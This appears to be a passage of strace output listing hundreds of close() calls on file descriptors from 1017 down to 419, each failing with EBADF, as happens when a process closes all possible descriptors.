close(1017)                             = -1 EBADF (Bad file descriptor)
close(1016)                             = -1 EBADF (Bad file descriptor)
close(1015)                             = -1 EBADF (Bad file descriptor)
close(1014)                             = -1 EBADF (Bad file descriptor)
close(1013)                             = -1 EBADF (Bad file descriptor)
close(1012)                             = -1 EBADF (Bad file descriptor)
close(1011)                             = -1 EBADF (Bad file descriptor)
close(1010)                             = -1 EBADF (Bad file descriptor)
close(1009)                             = -1 EBADF (Bad file descriptor)
close(1008)                             = -1 EBADF (Bad file descriptor)
close(1007)                             = -1 EBADF (Bad file descriptor)
close(1006)                             = -1 EBADF (Bad file descriptor)
close(1005)                             = -1 EBADF (Bad file descriptor)
close(1004)                             = -1 EBADF (Bad file descriptor)
close(1003)                             = -1 EBADF (Bad file descriptor)
close(1002)                             = -1 EBADF (Bad file descriptor)
close(1001)                             = -1 EBADF (Bad file descriptor)
close(1000)                             = -1 EBADF (Bad file descriptor)
close(999)                              = -1 EBADF (Bad file descriptor)
close(998)                              = -1 EBADF (Bad file descriptor)
close(997)                              = -1 EBADF (Bad file descriptor)
close(996)                              = -1 EBADF (Bad file descriptor)
close(995)                              = -1 EBADF (Bad file descriptor)
close(994)                              = -1 EBADF (Bad file descriptor)
close(993)                              = -1 EBADF (Bad file descriptor)
close(992)                              = -1 EBADF (Bad file descriptor)
close(991)                              = -1 EBADF (Bad file descriptor)
close(990)                              = -1 EBADF (Bad file descriptor)
close(989)                              = -1 EBADF (Bad file descriptor)
close(988)                              = -1 EBADF (Bad file descriptor)
close(987)                              = -1 EBADF (Bad file descriptor)
close(986)                              = -1 EBADF (Bad file descriptor)
close(985)                              = -1 EBADF (Bad file descriptor)
close(984)                              = -1 EBADF (Bad file descriptor)
close(983)                              = -1 EBADF (Bad file descriptor)
close(982)                              = -1 EBADF (Bad file descriptor)
close(981)                              = -1 EBADF (Bad file descriptor)
close(980)                              = -1 EBADF (Bad file descriptor)
close(979)                              = -1 EBADF (Bad file descriptor)
close(978)                              = -1 EBADF (Bad file descriptor)
close(977)                              = -1 EBADF (Bad file descriptor)
close(976)                              = -1 EBADF (Bad file descriptor)
close(975)                              = -1 EBADF (Bad file descriptor)
close(974)                              = -1 EBADF (Bad file descriptor)
close(973)                              = -1 EBADF (Bad file descriptor)
close(972)                              = -1 EBADF (Bad file descriptor)
close(971)                              = -1 EBADF (Bad file descriptor)
close(970)                              = -1 EBADF (Bad file descriptor)
close(969)                              = -1 EBADF (Bad file descriptor)
close(968)                              = -1 EBADF (Bad file descriptor)
close(967)                              = -1 EBADF (Bad file descriptor)
close(966)                              = -1 EBADF (Bad file descriptor)
close(965)                              = -1 EBADF (Bad file descriptor)
close(964)                              = -1 EBADF (Bad file descriptor)
close(963)                              = -1 EBADF (Bad file descriptor)
close(962)                              = -1 EBADF (Bad file descriptor)
close(961)                              = -1 EBADF (Bad file descriptor)
close(960)                              = -1 EBADF (Bad file descriptor)
close(959)                              = -1 EBADF (Bad file descriptor)
close(958)                              = -1 EBADF (Bad file descriptor)
close(957)                              = -1 EBADF (Bad file descriptor)
close(956)                              = -1 EBADF (Bad file descriptor)
close(955)                              = -1 EBADF (Bad file descriptor)
close(954)                              = -1 EBADF (Bad file descriptor)
close(953)                              = -1 EBADF (Bad file descriptor)
close(952)                              = -1 EBADF (Bad file descriptor)
close(951)                              = -1 EBADF (Bad file descriptor)
close(950)                              = -1 EBADF (Bad file descriptor)
close(949)                              = -1 EBADF (Bad file descriptor)
close(948)                              = -1 EBADF (Bad file descriptor)
close(947)                              = -1 EBADF (Bad file descriptor)
close(946)                              = -1 EBADF (Bad file descriptor)
close(945)                              = -1 EBADF (Bad file descriptor)
close(944)                              = -1 EBADF (Bad file descriptor)
close(943)                              = -1 EBADF (Bad file descriptor)
close(942)                              = -1 EBADF (Bad file descriptor)
close(941)                              = -1 EBADF (Bad file descriptor)
close(940)                              = -1 EBADF (Bad file descriptor)
close(939)                              = -1 EBADF (Bad file descriptor)
close(938)                              = -1 EBADF (Bad file descriptor)
close(937)                              = -1 EBADF (Bad file descriptor)
close(936)                              = -1 EBADF (Bad file descriptor)
close(935)                              = -1 EBADF (Bad file descriptor)
close(934)                              = -1 EBADF (Bad file descriptor)
close(933)                              = -1 EBADF (Bad file descriptor)
close(932)                              = -1 EBADF (Bad file descriptor)
close(931)                              = -1 EBADF (Bad file descriptor)
close(930)                              = -1 EBADF (Bad file descriptor)
close(929)                              = -1 EBADF (Bad file descriptor)
close(928)                              = -1 EBADF (Bad file descriptor)
close(927)                              = -1 EBADF (Bad file descriptor)
close(926)                              = -1 EBADF (Bad file descriptor)
close(925)                              = -1 EBADF (Bad file descriptor)
close(924)                              = -1 EBADF (Bad file descriptor)
close(923)                              = -1 EBADF (Bad file descriptor)
close(922)                              = -1 EBADF (Bad file descriptor)
close(921)                              = -1 EBADF (Bad file descriptor)
close(920)                              = -1 EBADF (Bad file descriptor)
close(919)                              = -1 EBADF (Bad file descriptor)
close(918)                              = -1 EBADF (Bad file descriptor)
close(917)                              = -1 EBADF (Bad file descriptor)
close(916)                              = -1 EBADF (Bad file descriptor)
close(915)                              = -1 EBADF (Bad file descriptor)
close(914)                              = -1 EBADF (Bad file descriptor)
close(913)                              = -1 EBADF (Bad file descriptor)
close(912)                              = -1 EBADF (Bad file descriptor)
close(911)                              = -1 EBADF (Bad file descriptor)
close(910)                              = -1 EBADF (Bad file descriptor)
close(909)                              = -1 EBADF (Bad file descriptor)
close(908)                              = -1 EBADF (Bad file descriptor)
close(907)                              = -1 EBADF (Bad file descriptor)
close(906)                              = -1 EBADF (Bad file descriptor)
close(905)                              = -1 EBADF (Bad file descriptor)
close(904)                              = -1 EBADF (Bad file descriptor)
close(903)                              = -1 EBADF (Bad file descriptor)
close(902)                              = -1 EBADF (Bad file descriptor)
close(901)                              = -1 EBADF (Bad file descriptor)
close(900)                              = -1 EBADF (Bad file descriptor)
close(899)                              = -1 EBADF (Bad file descriptor)
close(898)                              = -1 EBADF (Bad file descriptor)
close(897)                              = -1 EBADF (Bad file descriptor)
close(896)                              = -1 EBADF (Bad file descriptor)
close(895)                              = -1 EBADF (Bad file descriptor)
close(894)                              = -1 EBADF (Bad file descriptor)
close(893)                              = -1 EBADF (Bad file descriptor)
close(892)                              = -1 EBADF (Bad file descriptor)
close(891)                              = -1 EBADF (Bad file descriptor)
close(890)                              = -1 EBADF (Bad file descriptor)
close(889)                              = -1 EBADF (Bad file descriptor)
close(888)                              = -1 EBADF (Bad file descriptor)
close(887)                              = -1 EBADF (Bad file descriptor)
close(886)                              = -1 EBADF (Bad file descriptor)
close(885)                              = -1 EBADF (Bad file descriptor)
close(884)                              = -1 EBADF (Bad file descriptor)
close(883)                              = -1 EBADF (Bad file descriptor)
close(882)                              = -1 EBADF (Bad file descriptor)
close(881)                              = -1 EBADF (Bad file descriptor)
close(880)                              = -1 EBADF (Bad file descriptor)
close(879)                              = -1 EBADF (Bad file descriptor)
close(878)                              = -1 EBADF (Bad file descriptor)
close(877)                              = -1 EBADF (Bad file descriptor)
close(876)                              = -1 EBADF (Bad file descriptor)
close(875)                              = -1 EBADF (Bad file descriptor)
close(874)                              = -1 EBADF (Bad file descriptor)
close(873)                              = -1 EBADF (Bad file descriptor)
close(872)                              = -1 EBADF (Bad file descriptor)
close(871)                              = -1 EBADF (Bad file descriptor)
close(870)                              = -1 EBADF (Bad file descriptor)
close(869)                              = -1 EBADF (Bad file descriptor)
close(868)                              = -1 EBADF (Bad file descriptor)
close(867)                              = -1 EBADF (Bad file descriptor)
close(866)                              = -1 EBADF (Bad file descriptor)
close(865)                              = -1 EBADF (Bad file descriptor)
close(864)                              = -1 EBADF (Bad file descriptor)
close(863)                              = -1 EBADF (Bad file descriptor)
close(862)                              = -1 EBADF (Bad file descriptor)
close(861)                              = -1 EBADF (Bad file descriptor)
close(860)                              = -1 EBADF (Bad file descriptor)
close(859)                              = -1 EBADF (Bad file descriptor)
close(858)                              = -1 EBADF (Bad file descriptor)
close(857)                              = -1 EBADF (Bad file descriptor)
close(856)                              = -1 EBADF (Bad file descriptor)
close(855)                              = -1 EBADF (Bad file descriptor)
close(854)                              = -1 EBADF (Bad file descriptor)
close(853)                              = -1 EBADF (Bad file descriptor)
close(852)                              = -1 EBADF (Bad file descriptor)
close(851)                              = -1 EBADF (Bad file descriptor)
close(850)                              = -1 EBADF (Bad file descriptor)
close(849)                              = -1 EBADF (Bad file descriptor)
close(848)                              = -1 EBADF (Bad file descriptor)
close(847)                              = -1 EBADF (Bad file descriptor)
close(846)                              = -1 EBADF (Bad file descriptor)
close(845)                              = -1 EBADF (Bad file descriptor)
close(844)                              = -1 EBADF (Bad file descriptor)
close(843)                              = -1 EBADF (Bad file descriptor)
close(842)                              = -1 EBADF (Bad file descriptor)
close(841)                              = -1 EBADF (Bad file descriptor)
close(840)                              = -1 EBADF (Bad file descriptor)
close(839)                              = -1 EBADF (Bad file descriptor)
close(838)                              = -1 EBADF (Bad file descriptor)
close(837)                              = -1 EBADF (Bad file descriptor)
close(836)                              = -1 EBADF (Bad file descriptor)
close(835)                              = -1 EBADF (Bad file descriptor)
close(834)                              = -1 EBADF (Bad file descriptor)
close(833)                              = -1 EBADF (Bad file descriptor)
close(832)                              = -1 EBADF (Bad file descriptor)
close(831)                              = -1 EBADF (Bad file descriptor)
close(830)                              = -1 EBADF (Bad file descriptor)
close(829)                              = -1 EBADF (Bad file descriptor)
close(828)                              = -1 EBADF (Bad file descriptor)
close(827)                              = -1 EBADF (Bad file descriptor)
close(826)                              = -1 EBADF (Bad file descriptor)
close(825)                              = -1 EBADF (Bad file descriptor)
close(824)                              = -1 EBADF (Bad file descriptor)
close(823)                              = -1 EBADF (Bad file descriptor)
close(822)                              = -1 EBADF (Bad file descriptor)
close(821)                              = -1 EBADF (Bad file descriptor)
close(820)                              = -1 EBADF (Bad file descriptor)
close(819)                              = -1 EBADF (Bad file descriptor)
close(818)                              = -1 EBADF (Bad file descriptor)
close(817)                              = -1 EBADF (Bad file descriptor)
close(816)                              = -1 EBADF (Bad file descriptor)
close(815)                              = -1 EBADF (Bad file descriptor)
close(814)                              = -1 EBADF (Bad file descriptor)
close(813)                              = -1 EBADF (Bad file descriptor)
close(812)                              = -1 EBADF (Bad file descriptor)
close(811)                              = -1 EBADF (Bad file descriptor)
close(810)                              = -1 EBADF (Bad file descriptor)
close(809)                              = -1 EBADF (Bad file descriptor)
close(808)                              = -1 EBADF (Bad file descriptor)
close(807)                              = -1 EBADF (Bad file descriptor)
close(806)                              = -1 EBADF (Bad file descriptor)
close(805)                              = -1 EBADF (Bad file descriptor)
close(804)                              = -1 EBADF (Bad file descriptor)
close(803)                              = -1 EBADF (Bad file descriptor)
close(802)                              = -1 EBADF (Bad file descriptor)
close(801)                              = -1 EBADF (Bad file descriptor)
close(800)                              = -1 EBADF (Bad file descriptor)
close(799)                              = -1 EBADF (Bad file descriptor)
close(798)                              = -1 EBADF (Bad file descriptor)
close(797)                              = -1 EBADF (Bad file descriptor)
close(796)                              = -1 EBADF (Bad file descriptor)
close(795)                              = -1 EBADF (Bad file descriptor)
close(794)                              = -1 EBADF (Bad file descriptor)
close(793)                              = -1 EBADF (Bad file descriptor)
close(792)                              = -1 EBADF (Bad file descriptor)
close(791)                              = -1 EBADF (Bad file descriptor)
close(790)                              = -1 EBADF (Bad file descriptor)
close(789)                              = -1 EBADF (Bad file descriptor)
close(788)                              = -1 EBADF (Bad file descriptor)
close(787)                              = -1 EBADF (Bad file descriptor)
close(786)                              = -1 EBADF (Bad file descriptor)
close(785)                              = -1 EBADF (Bad file descriptor)
close(784)                              = -1 EBADF (Bad file descriptor)
close(783)                              = -1 EBADF (Bad file descriptor)
close(782)                              = -1 EBADF (Bad file descriptor)
close(781)                              = -1 EBADF (Bad file descriptor)
close(780)                              = -1 EBADF (Bad file descriptor)
close(779)                              = -1 EBADF (Bad file descriptor)
close(778)                              = -1 EBADF (Bad file descriptor)
close(777)                              = -1 EBADF (Bad file descriptor)
close(776)                              = -1 EBADF (Bad file descriptor)
close(775)                              = -1 EBADF (Bad file descriptor)
close(774)                              = -1 EBADF (Bad file descriptor)
close(773)                              = -1 EBADF (Bad file descriptor)
close(772)                              = -1 EBADF (Bad file descriptor)
close(771)                              = -1 EBADF (Bad file descriptor)
close(770)                              = -1 EBADF (Bad file descriptor)
close(769)                              = -1 EBADF (Bad file descriptor)
close(768)                              = -1 EBADF (Bad file descriptor)
close(767)                              = -1 EBADF (Bad file descriptor)
close(766)                              = -1 EBADF (Bad file descriptor)
close(765)                              = -1 EBADF (Bad file descriptor)
close(764)                              = -1 EBADF (Bad file descriptor)
close(763)                              = -1 EBADF (Bad file descriptor)
close(762)                              = -1 EBADF (Bad file descriptor)
close(761)                              = -1 EBADF (Bad file descriptor)
close(760)                              = -1 EBADF (Bad file descriptor)
close(759)                              = -1 EBADF (Bad file descriptor)
close(758)                              = -1 EBADF (Bad file descriptor)
close(757)                              = -1 EBADF (Bad file descriptor)
close(756)                              = -1 EBADF (Bad file descriptor)
close(755)                              = -1 EBADF (Bad file descriptor)
close(754)                              = -1 EBADF (Bad file descriptor)
close(753)                              = -1 EBADF (Bad file descriptor)
close(752)                              = -1 EBADF (Bad file descriptor)
close(751)                              = -1 EBADF (Bad file descriptor)
close(750)                              = -1 EBADF (Bad file descriptor)
close(749)                              = -1 EBADF (Bad file descriptor)
close(748)                              = -1 EBADF (Bad file descriptor)
close(747)                              = -1 EBADF (Bad file descriptor)
close(746)                              = -1 EBADF (Bad file descriptor)
close(745)                              = -1 EBADF (Bad file descriptor)
close(744)                              = -1 EBADF (Bad file descriptor)
close(743)                              = -1 EBADF (Bad file descriptor)
close(742)                              = -1 EBADF (Bad file descriptor)
close(741)                              = -1 EBADF (Bad file descriptor)
close(740)                              = -1 EBADF (Bad file descriptor)
close(739)                              = -1 EBADF (Bad file descriptor)
close(738)                              = -1 EBADF (Bad file descriptor)
close(737)                              = -1 EBADF (Bad file descriptor)
close(736)                              = -1 EBADF (Bad file descriptor)
close(735)                              = -1 EBADF (Bad file descriptor)
close(734)                              = -1 EBADF (Bad file descriptor)
close(733)                              = -1 EBADF (Bad file descriptor)
close(732)                              = -1 EBADF (Bad file descriptor)
close(731)                              = -1 EBADF (Bad file descriptor)
close(730)                              = -1 EBADF (Bad file descriptor)
close(729)                              = -1 EBADF (Bad file descriptor)
close(728)                              = -1 EBADF (Bad file descriptor)
close(727)                              = -1 EBADF (Bad file descriptor)
close(726)                              = -1 EBADF (Bad file descriptor)
close(725)                              = -1 EBADF (Bad file descriptor)
close(724)                              = -1 EBADF (Bad file descriptor)
close(723)                              = -1 EBADF (Bad file descriptor)
close(722)                              = -1 EBADF (Bad file descriptor)
close(721)                              = -1 EBADF (Bad file descriptor)
close(720)                              = -1 EBADF (Bad file descriptor)
close(719)                              = -1 EBADF (Bad file descriptor)
close(718)                              = -1 EBADF (Bad file descriptor)
close(717)                              = -1 EBADF (Bad file descriptor)
close(716)                              = -1 EBADF (Bad file descriptor)
close(715)                              = -1 EBADF (Bad file descriptor)
close(714)                              = -1 EBADF (Bad file descriptor)
close(713)                              = -1 EBADF (Bad file descriptor)
close(712)                              = -1 EBADF (Bad file descriptor)
close(711)                              = -1 EBADF (Bad file descriptor)
close(710)                              = -1 EBADF (Bad file descriptor)
close(709)                              = -1 EBADF (Bad file descriptor)
close(708)                              = -1 EBADF (Bad file descriptor)
close(707)                              = -1 EBADF (Bad file descriptor)
close(706)                              = -1 EBADF (Bad file descriptor)
close(705)                              = -1 EBADF (Bad file descriptor)
close(704)                              = -1 EBADF (Bad file descriptor)
close(703)                              = -1 EBADF (Bad file descriptor)
close(702)                              = -1 EBADF (Bad file descriptor)
close(701)                              = -1 EBADF (Bad file descriptor)
close(700)                              = -1 EBADF (Bad file descriptor)
close(699)                              = -1 EBADF (Bad file descriptor)
close(698)                              = -1 EBADF (Bad file descriptor)
close(697)                              = -1 EBADF (Bad file descriptor)
close(696)                              = -1 EBADF (Bad file descriptor)
close(695)                              = -1 EBADF (Bad file descriptor)
close(694)                              = -1 EBADF (Bad file descriptor)
close(693)                              = -1 EBADF (Bad file descriptor)
close(692)                              = -1 EBADF (Bad file descriptor)
close(691)                              = -1 EBADF (Bad file descriptor)
close(690)                              = -1 EBADF (Bad file descriptor)
close(689)                              = -1 EBADF (Bad file descriptor)
close(688)                              = -1 EBADF (Bad file descriptor)
close(687)                              = -1 EBADF (Bad file descriptor)
close(686)                              = -1 EBADF (Bad file descriptor)
close(685)                              = -1 EBADF (Bad file descriptor)
close(684)                              = -1 EBADF (Bad file descriptor)
close(683)                              = -1 EBADF (Bad file descriptor)
close(682)                              = -1 EBADF (Bad file descriptor)
close(681)                              = -1 EBADF (Bad file descriptor)
close(680)                              = -1 EBADF (Bad file descriptor)
close(679)                              = -1 EBADF (Bad file descriptor)
close(678)                              = -1 EBADF (Bad file descriptor)
close(677)                              = -1 EBADF (Bad file descriptor)
close(676)                              = -1 EBADF (Bad file descriptor)
close(675)                              = -1 EBADF (Bad file descriptor)
close(674)                              = -1 EBADF (Bad file descriptor)
close(673)                              = -1 EBADF (Bad file descriptor)
close(672)                              = -1 EBADF (Bad file descriptor)
close(671)                              = -1 EBADF (Bad file descriptor)
close(670)                              = -1 EBADF (Bad file descriptor)
close(669)                              = -1 EBADF (Bad file descriptor)
close(668)                              = -1 EBADF (Bad file descriptor)
close(667)                              = -1 EBADF (Bad file descriptor)
close(666)                              = -1 EBADF (Bad file descriptor)
close(665)                              = -1 EBADF (Bad file descriptor)
close(664)                              = -1 EBADF (Bad file descriptor)
close(663)                              = -1 EBADF (Bad file descriptor)
close(662)                              = -1 EBADF (Bad file descriptor)
close(661)                              = -1 EBADF (Bad file descriptor)
close(660)                              = -1 EBADF (Bad file descriptor)
close(659)                              = -1 EBADF (Bad file descriptor)
close(658)                              = -1 EBADF (Bad file descriptor)
close(657)                              = -1 EBADF (Bad file descriptor)
close(656)                              = -1 EBADF (Bad file descriptor)
close(655)                              = -1 EBADF (Bad file descriptor)
close(654)                              = -1 EBADF (Bad file descriptor)
close(653)                              = -1 EBADF (Bad file descriptor)
close(652)                              = -1 EBADF (Bad file descriptor)
close(651)                              = -1 EBADF (Bad file descriptor)
close(650)                              = -1 EBADF (Bad file descriptor)
close(649)                              = -1 EBADF (Bad file descriptor)
close(648)                              = -1 EBADF (Bad file descriptor)
close(647)                              = -1 EBADF (Bad file descriptor)
close(646)                              = -1 EBADF (Bad file descriptor)
close(645)                              = -1 EBADF (Bad file descriptor)
close(644)                              = -1 EBADF (Bad file descriptor)
close(643)                              = -1 EBADF (Bad file descriptor)
close(642)                              = -1 EBADF (Bad file descriptor)
close(641)                              = -1 EBADF (Bad file descriptor)
close(640)                              = -1 EBADF (Bad file descriptor)
close(639)                              = -1 EBADF (Bad file descriptor)
close(638)                              = -1 EBADF (Bad file descriptor)
close(637)                              = -1 EBADF (Bad file descriptor)
close(636)                              = -1 EBADF (Bad file descriptor)
close(635)                              = -1 EBADF (Bad file descriptor)
close(634)                              = -1 EBADF (Bad file descriptor)
close(633)                              = -1 EBADF (Bad file descriptor)
close(632)                              = -1 EBADF (Bad file descriptor)
close(631)                              = -1 EBADF (Bad file descriptor)
close(630)                              = -1 EBADF (Bad file descriptor)
close(629)                              = -1 EBADF (Bad file descriptor)
close(628)                              = -1 EBADF (Bad file descriptor)
close(627)                              = -1 EBADF (Bad file descriptor)
close(626)                              = -1 EBADF (Bad file descriptor)
close(625)                              = -1 EBADF (Bad file descriptor)
close(624)                              = -1 EBADF (Bad file descriptor)
close(623)                              = -1 EBADF (Bad file descriptor)
close(622)                              = -1 EBADF (Bad file descriptor)
close(621)                              = -1 EBADF (Bad file descriptor)
close(620)                              = -1 EBADF (Bad file descriptor)
close(619)                              = -1 EBADF (Bad file descriptor)
close(618)                              = -1 EBADF (Bad file descriptor)
close(617)                              = -1 EBADF (Bad file descriptor)
close(616)                              = -1 EBADF (Bad file descriptor)
close(615)                              = -1 EBADF (Bad file descriptor)
close(614)                              = -1 EBADF (Bad file descriptor)
close(613)                              = -1 EBADF (Bad file descriptor)
close(612)                              = -1 EBADF (Bad file descriptor)
close(611)                              = -1 EBADF (Bad file descriptor)
close(610)                              = -1 EBADF (Bad file descriptor)
close(609)                              = -1 EBADF (Bad file descriptor)
close(608)                              = -1 EBADF (Bad file descriptor)
close(607)                              = -1 EBADF (Bad file descriptor)
close(606)                              = -1 EBADF (Bad file descriptor)
close(605)                              = -1 EBADF (Bad file descriptor)
close(604)                              = -1 EBADF (Bad file descriptor)
close(603)                              = -1 EBADF (Bad file descriptor)
close(602)                              = -1 EBADF (Bad file descriptor)
close(601)                              = -1 EBADF (Bad file descriptor)
close(600)                              = -1 EBADF (Bad file descriptor)
close(599)                              = -1 EBADF (Bad file descriptor)
close(598)                              = -1 EBADF (Bad file descriptor)
close(597)                              = -1 EBADF (Bad file descriptor)
close(596)                              = -1 EBADF (Bad file descriptor)
close(595)                              = -1 EBADF (Bad file descriptor)
close(594)                              = -1 EBADF (Bad file descriptor)
close(593)                              = -1 EBADF (Bad file descriptor)
close(592)                              = -1 EBADF (Bad file descriptor)
close(591)                              = -1 EBADF (Bad file descriptor)
close(590)                              = -1 EBADF (Bad file descriptor)
close(589)                              = -1 EBADF (Bad file descriptor)
close(588)                              = -1 EBADF (Bad file descriptor)
close(587)                              = -1 EBADF (Bad file descriptor)
close(586)                              = -1 EBADF (Bad file descriptor)
close(585)                              = -1 EBADF (Bad file descriptor)
close(584)                              = -1 EBADF (Bad file descriptor)
close(583)                              = -1 EBADF (Bad file descriptor)
close(582)                              = -1 EBADF (Bad file descriptor)
close(581)                              = -1 EBADF (Bad file descriptor)
close(580)                              = -1 EBADF (Bad file descriptor)
close(579)                              = -1 EBADF (Bad file descriptor)
close(578)                              = -1 EBADF (Bad file descriptor)
close(577)                              = -1 EBADF (Bad file descriptor)
close(576)                              = -1 EBADF (Bad file descriptor)
close(575)                              = -1 EBADF (Bad file descriptor)
close(574)                              = -1 EBADF (Bad file descriptor)
close(573)                              = -1 EBADF (Bad file descriptor)
close(572)                              = -1 EBADF (Bad file descriptor)
close(571)                              = -1 EBADF (Bad file descriptor)
close(570)                              = -1 EBADF (Bad file descriptor)
close(569)                              = -1 EBADF (Bad file descriptor)
close(568)                              = -1 EBADF (Bad file descriptor)
close(567)                              = -1 EBADF (Bad file descriptor)
close(566)                              = -1 EBADF (Bad file descriptor)
close(565)                              = -1 EBADF (Bad file descriptor)
close(564)                              = -1 EBADF (Bad file descriptor)
close(563)                              = -1 EBADF (Bad file descriptor)
close(562)                              = -1 EBADF (Bad file descriptor)
close(561)                              = -1 EBADF (Bad file descriptor)
close(560)                              = -1 EBADF (Bad file descriptor)
close(559)                              = -1 EBADF (Bad file descriptor)
close(558)                              = -1 EBADF (Bad file descriptor)
close(557)                              = -1 EBADF (Bad file descriptor)
close(556)                              = -1 EBADF (Bad file descriptor)
close(555)                              = -1 EBADF (Bad file descriptor)
close(554)                              = -1 EBADF (Bad file descriptor)
close(553)                              = -1 EBADF (Bad file descriptor)
close(552)                              = -1 EBADF (Bad file descriptor)
close(551)                              = -1 EBADF (Bad file descriptor)
close(550)                              = -1 EBADF (Bad file descriptor)
close(549)                              = -1 EBADF (Bad file descriptor)
close(548)                              = -1 EBADF (Bad file descriptor)
close(547)                              = -1 EBADF (Bad file descriptor)
close(546)                              = -1 EBADF (Bad file descriptor)
close(545)                              = -1 EBADF (Bad file descriptor)
close(544)                              = -1 EBADF (Bad file descriptor)
close(543)                              = -1 EBADF (Bad file descriptor)
close(542)                              = -1 EBADF (Bad file descriptor)
close(541)                              = -1 EBADF (Bad file descriptor)
close(540)                              = -1 EBADF (Bad file descriptor)
close(539)                              = -1 EBADF (Bad file descriptor)
close(538)                              = -1 EBADF (Bad file descriptor)
close(537)                              = -1 EBADF (Bad file descriptor)
close(536)                              = -1 EBADF (Bad file descriptor)
close(535)                              = -1 EBADF (Bad file descriptor)
close(534)                              = -1 EBADF (Bad file descriptor)
close(533)                              = -1 EBADF (Bad file descriptor)
close(532)                              = -1 EBADF (Bad file descriptor)
close(531)                              = -1 EBADF (Bad file descriptor)
close(530)                              = -1 EBADF (Bad file descriptor)
close(529)                              = -1 EBADF (Bad file descriptor)
close(528)                              = -1 EBADF (Bad file descriptor)
close(527)                              = -1 EBADF (Bad file descriptor)
close(526)                              = -1 EBADF (Bad file descriptor)
close(525)                              = -1 EBADF (Bad file descriptor)
close(524)                              = -1 EBADF (Bad file descriptor)
close(523)                              = -1 EBADF (Bad file descriptor)
close(522)                              = -1 EBADF (Bad file descriptor)
close(521)                              = -1 EBADF (Bad file descriptor)
close(520)                              = -1 EBADF (Bad file descriptor)
close(519)                              = -1 EBADF (Bad file descriptor)
close(518)                              = -1 EBADF (Bad file descriptor)
close(517)                              = -1 EBADF (Bad file descriptor)
close(516)                              = -1 EBADF (Bad file descriptor)
close(515)                              = -1 EBADF (Bad file descriptor)
close(514)                              = -1 EBADF (Bad file descriptor)
close(513)                              = -1 EBADF (Bad file descriptor)
close(512)                              = -1 EBADF (Bad file descriptor)
close(511)                              = -1 EBADF (Bad file descriptor)
close(510)                              = -1 EBADF (Bad file descriptor)
close(509)                              = -1 EBADF (Bad file descriptor)
close(508)                              = -1 EBADF (Bad file descriptor)
close(507)                              = -1 EBADF (Bad file descriptor)
close(506)                              = -1 EBADF (Bad file descriptor)
close(505)                              = -1 EBADF (Bad file descriptor)
close(504)                              = -1 EBADF (Bad file descriptor)
close(503)                              = -1 EBADF (Bad file descriptor)
close(502)                              = -1 EBADF (Bad file descriptor)
close(501)                              = -1 EBADF (Bad file descriptor)
close(500)                              = -1 EBADF (Bad file descriptor)
close(499)                              = -1 EBADF (Bad file descriptor)
close(498)                              = -1 EBADF (Bad file descriptor)
close(497)                              = -1 EBADF (Bad file descriptor)
close(496)                              = -1 EBADF (Bad file descriptor)
close(495)                              = -1 EBADF (Bad file descriptor)
close(494)                              = -1 EBADF (Bad file descriptor)
close(493)                              = -1 EBADF (Bad file descriptor)
close(492)                              = -1 EBADF (Bad file descriptor)
close(491)                              = -1 EBADF (Bad file descriptor)
close(490)                              = -1 EBADF (Bad file descriptor)
close(489)                              = -1 EBADF (Bad file descriptor)
close(488)                              = -1 EBADF (Bad file descriptor)
close(487)                              = -1 EBADF (Bad file descriptor)
close(486)                              = -1 EBADF (Bad file descriptor)
close(485)                              = -1 EBADF (Bad file descriptor)
close(484)                              = -1 EBADF (Bad file descriptor)
close(483)                              = -1 EBADF (Bad file descriptor)
close(482)                              = -1 EBADF (Bad file descriptor)
close(481)                              = -1 EBADF (Bad file descriptor)
close(480)                              = -1 EBADF (Bad file descriptor)
close(479)                              = -1 EBADF (Bad file descriptor)
close(478)                              = -1 EBADF (Bad file descriptor)
close(477)                              = -1 EBADF (Bad file descriptor)
close(476)                              = -1 EBADF (Bad file descriptor)
close(475)                              = -1 EBADF (Bad file descriptor)
close(474)                              = -1 EBADF (Bad file descriptor)
close(473)                              = -1 EBADF (Bad file descriptor)
close(472)                              = -1 EBADF (Bad file descriptor)
close(471)                              = -1 EBADF (Bad file descriptor)
close(470)                              = -1 EBADF (Bad file descriptor)
close(469)                              = -1 EBADF (Bad file descriptor)
close(468)                              = -1 EBADF (Bad file descriptor)
close(467)                              = -1 EBADF (Bad file descriptor)
close(466)                              = -1 EBADF (Bad file descriptor)
close(465)                              = -1 EBADF (Bad file descriptor)
close(464)                              = -1 EBADF (Bad file descriptor)
close(463)                              = -1 EBADF (Bad file descriptor)
close(462)                              = -1 EBADF (Bad file descriptor)
close(461)                              = -1 EBADF (Bad file descriptor)
close(460)                              = -1 EBADF (Bad file descriptor)
close(459)                              = -1 EBADF (Bad file descriptor)
close(458)                              = -1 EBADF (Bad file descriptor)
close(457)                              = -1 EBADF (Bad file descriptor)
close(456)                              = -1 EBADF (Bad file descriptor)
close(455)                              = -1 EBADF (Bad file descriptor)
close(454)                              = -1 EBADF (Bad file descriptor)
close(453)                              = -1 EBADF (Bad file descriptor)
close(452)                              = -1 EBADF (Bad file descriptor)
close(451)                              = -1 EBADF (Bad file descriptor)
close(450)                              = -1 EBADF (Bad file descriptor)
close(449)                              = -1 EBADF (Bad file descriptor)
close(448)                              = -1 EBADF (Bad file descriptor)
close(447)                              = -1 EBADF (Bad file descriptor)
close(446)                              = -1 EBADF (Bad file descriptor)
close(445)                              = -1 EBADF (Bad file descriptor)
close(444)                              = -1 EBADF (Bad file descriptor)
close(443)                              = -1 EBADF (Bad file descriptor)
close(442)                              = -1 EBADF (Bad file descriptor)
close(441)                              = -1 EBADF (Bad file descriptor)
close(440)                              = -1 EBADF (Bad file descriptor)
close(439)                              = -1 EBADF (Bad file descriptor)
close(438)                              = -1 EBADF (Bad file descriptor)
close(437)                              = -1 EBADF (Bad file descriptor)
close(436)                              = -1 EBADF (Bad file descriptor)
close(435)                              = -1 EBADF (Bad file descriptor)
close(434)                              = -1 EBADF (Bad file descriptor)
close(433)                              = -1 EBADF (Bad file descriptor)
close(432)                              = -1 EBADF (Bad file descriptor)
close(431)                              = -1 EBADF (Bad file descriptor)
close(430)                              = -1 EBADF (Bad file descriptor)
close(429)                              = -1 EBADF (Bad file descriptor)
close(428)                              = -1 EBADF (Bad file descriptor)
close(427)                              = -1 EBADF (Bad file descriptor)
close(426)                              = -1 EBADF (Bad file descriptor)
close(425)                              = -1 EBADF (Bad file descriptor)
close(424)                              = -1 EBADF (Bad file descriptor)
close(423)                              = -1 EBADF (Bad file descriptor)
close(422)                              = -1 EBADF (Bad file descriptor)
close(421)                              = -1 EBADF (Bad file descriptor)
close(420)                              = -1 EBADF (Bad file descriptor)
close(419)                              = -1 EBADF (Bad file descriptor)
